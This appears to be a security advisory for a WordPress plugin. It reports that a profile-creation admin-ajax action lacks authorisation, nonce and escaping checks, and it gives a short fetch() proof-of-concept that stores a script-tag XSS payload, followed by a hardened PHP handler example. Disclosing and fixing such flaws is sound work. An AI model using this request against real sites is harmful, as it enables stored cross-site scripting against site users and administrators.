The plugin does not perform authorisation, CSRF (nonce) or sanitisation/escaping checks when creating a profile, allowing any authenticated user to create arbitrary profiles containing Cross-Site Scripting payloads.
Create profile:

```javascript
fetch("https://example.com/wp-admin/admin-ajax.php?action=kc_create_profile", {
  "headers": { "content-type": "application/x-www-form-urlencoded" },
  "body": new URLSearchParams({ "name": "y", "slug": "y", "data": btoa("<script>alert(1);</script>") }),
  "method": "POST",
  "credentials": "include"
});
```

The XSS will be triggered at: https://example.com/wp-admin/admin-ajax.php?action=kc_download_profile&name=y
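For comparison, the following is an added example (not the affected plugin's code) of how the two admin-ajax handlers would look with the missing checks in place: a capability check, a nonce check, input sanitisation and safe output. The `kc_example_*` function names, the `nonce` field and the `kc_example_profiles` option key are assumptions.

```php
<?php
// Added example (not the affected plugin's code): hardened admin-ajax handlers.
// Function names, the 'nonce' field and the option key are assumptions.
add_action( 'wp_ajax_kc_create_profile', 'kc_example_create_profile' );
function kc_example_create_profile() {
    // 1. Authorisation: only users who may manage options can create profiles.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // 2. CSRF: require a nonce issued by wp_create_nonce( 'kc_create_profile' )
    //    and submitted in the 'nonce' field (assumed field name).
    check_ajax_referer( 'kc_create_profile', 'nonce' );
    // 3. Input sanitisation: plain text name, key-safe slug, strict base64 decode.
    $name = isset( $_POST['name'] ) ? sanitize_text_field( wp_unslash( $_POST['name'] ) ) : '';
    $slug = isset( $_POST['slug'] ) ? sanitize_key( $_POST['slug'] ) : '';
    $raw  = isset( $_POST['data'] ) ? base64_decode( wp_unslash( $_POST['data'] ), true ) : false;
    if ( '' === $name || '' === $slug || false === $raw ) {
        wp_send_json_error( 'invalid input', 400 );
    }
    // Keep only markup an untrusted author may supply; <script> is stripped.
    $data = wp_kses_post( $raw );
    $profiles          = get_option( 'kc_example_profiles', array() );
    $profiles[ $slug ] = array( 'name' => $name, 'data' => $data );
    update_option( 'kc_example_profiles', $profiles );
    wp_send_json_success( array( 'slug' => $slug ) );
}

add_action( 'wp_ajax_kc_download_profile', 'kc_example_download_profile' );
function kc_example_download_profile() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $slug     = isset( $_GET['name'] ) ? sanitize_key( $_GET['name'] ) : '';
    $profiles = get_option( 'kc_example_profiles', array() );
    if ( ! isset( $profiles[ $slug ] ) ) {
        wp_send_json_error( 'not found', 404 );
    }
    // 4. Output handling: serve the profile as a download with a non-HTML
    //    content type so stored data is never rendered as a page in the browser.
    header( 'Content-Type: application/json; charset=utf-8' );
    header( 'Content-Disposition: attachment; filename="' . $slug . '.json"' );
    header( 'X-Content-Type-Options: nosniff' );
    echo wp_json_encode( $profiles[ $slug ] );
    wp_die();
}
```

With these checks, the request shown above fails at the capability check for a low-privileged user and at `check_ajax_referer` for a cross-site request, and a stored `<script>` tag is removed before it is saved.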
Krzysztof Zając
Yes
2022-03-14
2022-04-11